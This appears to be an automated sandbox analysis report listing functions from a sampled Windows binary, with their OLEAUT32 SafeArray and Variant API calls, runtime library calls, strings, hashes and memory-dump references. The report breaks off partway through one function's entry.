Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 2462b52a3af77fcd04677e40e3f7b144af60a83aee61266cfa1cbf44ff48417d
Instruction ID: 03ecadf504461352ceec7d4c2db52156e101d9799e63723769bcff966995a399
Opcode Fuzzy Hash: 2462b52a3af77fcd04677e40e3f7b144af60a83aee61266cfa1cbf44ff48417d
Instruction Fuzzy Hash: 50B18D717181449BDB28CE1CDDA1A9FB3AAEB95314714891CF892CBF80C771EC95CBA1

Function 6CF77FC4 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getBasicDataType.LIBCMT ref: 6CF77FFF
DName::operator=.LIBCMT ref: 6CF78013
DName::operator+=.LIBCMT ref: 6CF78021
UnDecorator::getPtrRefType.LIBCMT ref: 6CF7804D
UnDecorator::getDataIndirectType.LIBCMT ref: 6CF780CA
UnDecorator::getBasicDataType.LIBCMT ref: 6CF780D3
operator+.LIBCMT ref: 6CF78166

Strings

volatile, xrefs: 6CF7800B, 6CF78139
std::nullptr_t, xrefs: 6CF78122

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
String ID: std::nullptr_t$volatile
API String ID: 2203807771-3726895890
Opcode ID: b7ae136e97b6a8e080035aa50c40abfa326e955fa08bc6d6dd7a20786c9fa2bf
Instruction ID: d83c4f76734e60d23f4097597f583752899dd364bc76c31a72f774fef27ac5c0
Opcode Fuzzy Hash: b7ae136e97b6a8e080035aa50c40abfa326e955fa08bc6d6dd7a20786c9fa2bf
Instruction Fuzzy Hash: B741EF72A15108FFCB31DF94E844AEEBB75FF02345F218067E91467A20D7729A458B70

Function 6CF25140 Relevance: 21.2, APIs: 14, Instructions: 203COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF25177

Part of subcall function 6CF32820: _malloc.LIBCMT ref: 6CF32871

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6CF251B9
SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CF251D5
SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6CF251E5
_memmove.LIBCMT ref: 6CF251FF
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CF25208
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF2522C
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CF25263
VariantClear.OLEAUT32(?), ref: 6CF2526C
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CF252AD
VariantClear.OLEAUT32(?), ref: 6CF252B6
SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6CF252D2
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF2534E
VariantClear.OLEAUT32(?), ref: 6CF25358

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
String ID:
API String ID: 452649785-0
Opcode ID: eec49d204c553a0e3c9151134ba34c9e7e5a9f57a7a78a367d4dc28e794b37a7
Instruction ID: 613249b17735d004207e87ed25a67579d3cc59787c996903ec4ac4e7eff17ee4
Opcode Fuzzy Hash: eec49d204c553a0e3c9151134ba34c9e7e5a9f57a7a78a367d4dc28e794b37a7
Instruction Fuzzy Hash: 0B7128B1A1161AEFDB01CFA5C884BAFBBB9FF49304F108119E915E7640E774E905CBA0

Function 6CF1F95E Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 332COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF1FA0F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF1FA22
SafeArrayGetElement.OLEAUT32 ref: 6CF1FA5A

Part of subcall function 6CF23A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF23B71
Part of subcall function 6CF23A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF23B83

Part of subcall function 6CF269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF26A08
Part of subcall function 6CF269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF26A15
Part of subcall function 6CF269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF26A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Part of subcall function 6CF1DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF1DFF6
Part of subcall function 6CF1DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF1E003
Part of subcall function 6CF1DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF1E02F

Strings

RS{m, xrefs: 6CF1FC3E
RS7m, xrefs: 6CF1FC82

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID: RS7m$RS{m
API String ID: 959723449-144615663
Opcode ID: 10bb30f6e06b111f0f57b5be139418e5a8007f1db057a5da01333f62eda0285e
Instruction ID: 116e28a59f16627a9ed3a9481642ffc968595560518a035e8034c4a32c093786
Opcode Fuzzy Hash: 10bb30f6e06b111f0f57b5be139418e5a8007f1db057a5da01333f62eda0285e
Instruction Fuzzy Hash: F8C16070A152049FDB14DFA8CC84FADB7B9AF85308F204198E945EBB86DB76ED44CB50

Function 6CF23690 Relevance: 18.2, APIs: 12, Instructions: 215COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF236CD
VariantInit.OLEAUT32(?), ref: 6CF236DA
VariantInit.OLEAUT32(?), ref: 6CF236E0
VariantInit.OLEAUT32(?), ref: 6CF236E6
VariantInit.OLEAUT32 ref: 6CF237DD
VariantCopy.OLEAUT32(?,?), ref: 6CF237E4
VariantInit.OLEAUT32 ref: 6CF23815
VariantCopy.OLEAUT32(?,?), ref: 6CF2381C
VariantClear.OLEAUT32(?), ref: 6CF238A8
VariantClear.OLEAUT32(?), ref: 6CF238AE
VariantClear.OLEAUT32(?), ref: 6CF238B4
VariantClear.OLEAUT32(?), ref: 6CF238BA

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: 725500a94e5a30409bfd3ee19a9b7cf9e8e45d777ec16baec71c3826c4deaac3
Instruction ID: 64194b197eb2601ee5426decb6067fd6a7e469b628bb77eaa0b1dd247540f613
Opcode Fuzzy Hash: 725500a94e5a30409bfd3ee19a9b7cf9e8e45d777ec16baec71c3826c4deaac3
Instruction Fuzzy Hash: F9817CB1A01219AFDB04DFE8C884BEEBBB9FF49304F154559E505AB740DB74E909CB90

Function 6CF2D880 Relevance: 18.2, APIs: 12, Instructions: 202COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF2D8EC
VariantInit.OLEAUT32 ref: 6CF2D902
VariantInit.OLEAUT32(?), ref: 6CF2D90D
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF2D929
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CF2D966
VariantClear.OLEAUT32(?), ref: 6CF2D973
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CF2D9B4
VariantClear.OLEAUT32(?), ref: 6CF2D9C1
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2DA6F
VariantClear.OLEAUT32(?), ref: 6CF2DA80
VariantClear.OLEAUT32(?), ref: 6CF2DA87
VariantClear.OLEAUT32(?), ref: 6CF2DA99

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: 6c59ece71259dcfd2801f9e706161083ebcacf2a93dca1ee157ddf87ec9b92e7
Instruction ID: fd219cd8fcd7b8cf9338a7d37ba292ab98bb9b231b08ca382d93d42d7f6b4877
Opcode Fuzzy Hash: 6c59ece71259dcfd2801f9e706161083ebcacf2a93dca1ee157ddf87ec9b92e7
Instruction Fuzzy Hash: B98145726093019FC704CFA8C884B5ABBF8FF89714F158A5DE9948B750E738E905CB92

Function 6CF112A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF112DD
std::_Xinvalid_argument.LIBCPMT ref: 6CF112FB
_memmove.LIBCMT ref: 6CF11368
_memmove.LIBCMT ref: 6CF1139F
std::_Xinvalid_argument.LIBCPMT ref: 6CF1140C

Strings

string too long, xrefs: 6CF112D8, 6CF112F6
invalid string position, xrefs: 6CF11407

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: ca223401591542daaf3470253ec8a34d357b6cfa7231ac58c43f0ce6b4f58423
Instruction ID: 15a53ba29f48e6fb63ebe7f681339155bc581541860561f1ca062a13385f4f7a
Opcode Fuzzy Hash: ca223401591542daaf3470253ec8a34d357b6cfa7231ac58c43f0ce6b4f58423
Instruction Fuzzy Hash: 0341B7323092445BD714CE5DDC90A9EB3A6EB91754B348A2EE491C7F44D731DC45C7A2

Function 6CF24BA0 Relevance: 15.5, APIs: 10, Instructions: 475COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF24BDC
VariantInit.OLEAUT32(?), ref: 6CF24BE5
VariantInit.OLEAUT32(?), ref: 6CF24BEB
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF24BF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF24C2A
VariantClear.OLEAUT32(?), ref: 6CF24C37
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF25107
VariantClear.OLEAUT32(?), ref: 6CF25117
VariantClear.OLEAUT32(?), ref: 6CF2511D
VariantClear.OLEAUT32(?), ref: 6CF25123

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 9ba18a3fab25111ac2ac681aea6064c271e7b52923b5252e9cab4274faa03958
Instruction ID: 27e1b8274b46ebf408e7ce02f99f4460ffd98a26d076011de624976e041d4d47
Opcode Fuzzy Hash: 9ba18a3fab25111ac2ac681aea6064c271e7b52923b5252e9cab4274faa03958
Instruction Fuzzy Hash: 6012F475A15705AFC758DBE8DD84DAAB3B9BF8D300F144668F50AABB91CA30F841CB50

Function 6CF249B0 Relevance: 15.2, APIs: 10, Instructions: 174COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6CF805A8), ref: 6CF249EE
VariantInit.OLEAUT32(?), ref: 6CF249F7
VariantInit.OLEAUT32(?), ref: 6CF249FD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF24A08
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF24A39
VariantClear.OLEAUT32(?), ref: 6CF24A45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF24B66
VariantClear.OLEAUT32(?), ref: 6CF24B76
VariantClear.OLEAUT32(?), ref: 6CF24B7C
VariantClear.OLEAUT32(6CF805A8), ref: 6CF24B82

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 94b109a4541f1844617e32c0d5944377415aa6003403ac9f5d57d2188d576a38
Instruction ID: f449e1afb8e849797d20b191e851ffde95c4506cdb12c78526e6114c78b77529
Opcode Fuzzy Hash: 94b109a4541f1844617e32c0d5944377415aa6003403ac9f5d57d2188d576a38
Instruction Fuzzy Hash: BC516976A00219AFDB04DFE4CC84EAEBBB8FF89314F144169E915EB745D774A901CBA0

Function 6CF247D0 Relevance: 15.2, APIs: 10, Instructions: 168COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF2480C
VariantInit.OLEAUT32(?), ref: 6CF24815
VariantInit.OLEAUT32(?), ref: 6CF2481B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF24826
SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6CF2485B
VariantClear.OLEAUT32(?), ref: 6CF24868
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF24974
VariantClear.OLEAUT32(?), ref: 6CF24984
VariantClear.OLEAUT32(?), ref: 6CF2498A
VariantClear.OLEAUT32(?), ref: 6CF24990

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 18e6e91f1bee8a19a7d2e35ae288c5e684828435b07355576f5905ad09909095
Instruction ID: dcc4cd8bf004d0ab28074a03f7a0363433c57aac0983f2dbf8dd4ce322974f44
Opcode Fuzzy Hash: 18e6e91f1bee8a19a7d2e35ae288c5e684828435b07355576f5905ad09909095
Instruction Fuzzy Hash: D2515A72A01249AFCB04DFE4CC80EEEBBB9FF89314F14456DE506AB640D774A905CBA0

Function 6CF1DCD0 Relevance: 15.1, APIs: 10, Instructions: 138COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF1DD00
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6CF1DD10
SafeArrayPutElement.OLEAUT32(00000000,6CF22FFF,?), ref: 6CF1DD47
VariantClear.OLEAUT32(?), ref: 6CF1DD4F
SafeArrayPutElement.OLEAUT32(00000000,6CF22FFF,?), ref: 6CF1DD6D
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CF1DDA4
VariantClear.OLEAUT32(?), ref: 6CF1DDAC
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF1DE16
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF1DE27
VariantClear.OLEAUT32(?), ref: 6CF1DE31

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
String ID:
API String ID: 3525949229-0
Opcode ID: 617aaa21e5eacdd5de1859dfc1e59ba30002b4f5fac7e2989371f93e63aaa5c6
Instruction ID: 00a992b183b91d0543ada2eb8ef0af6ce0038c8b471401a526588bdc65349a7b
Opcode Fuzzy Hash: 617aaa21e5eacdd5de1859dfc1e59ba30002b4f5fac7e2989371f93e63aaa5c6
Instruction Fuzzy Hash: D5516B75A05609AFDB01DFA4C894FEFBBB8FF9A700F118119EA15A7750DB349901CBA0

Function 6CF3C1B0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF3C213

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

Strings

gfff, xrefs: 6CF3C2EA
gfff, xrefs: 6CF3C259
gfff, xrefs: 6CF3C1F2
gfff, xrefs: 6CF3C3A3
vector<T> too long, xrefs: 6CF3C20E
gfff, xrefs: 6CF3C222
gfff, xrefs: 6CF3C3F7

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
API String ID: 1823113695-1254974138
Opcode ID: 2d7e029fa6b5474046c62cb6ef1792075ca68ccaf261affba523d3279abb32aa
Instruction ID: 2f638b442b7e16110c31feb546a91def574ce70b0cc7628f1702c4cfcee87b1e
Opcode Fuzzy Hash: 2d7e029fa6b5474046c62cb6ef1792075ca68ccaf261affba523d3279abb32aa
Instruction Fuzzy Hash: BE917875A00609AFCB18DF59DC90EEEB7B9EB88314F14861DE959DB740D730BA04CBA1

Function 6CF10CD0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF10D3A
std::_Xinvalid_argument.LIBCPMT ref: 6CF10D60
_memmove.LIBCMT ref: 6CF10D95
std::_Xinvalid_argument.LIBCPMT ref: 6CF10DBF
_memmove.LIBCMT ref: 6CF10E3E

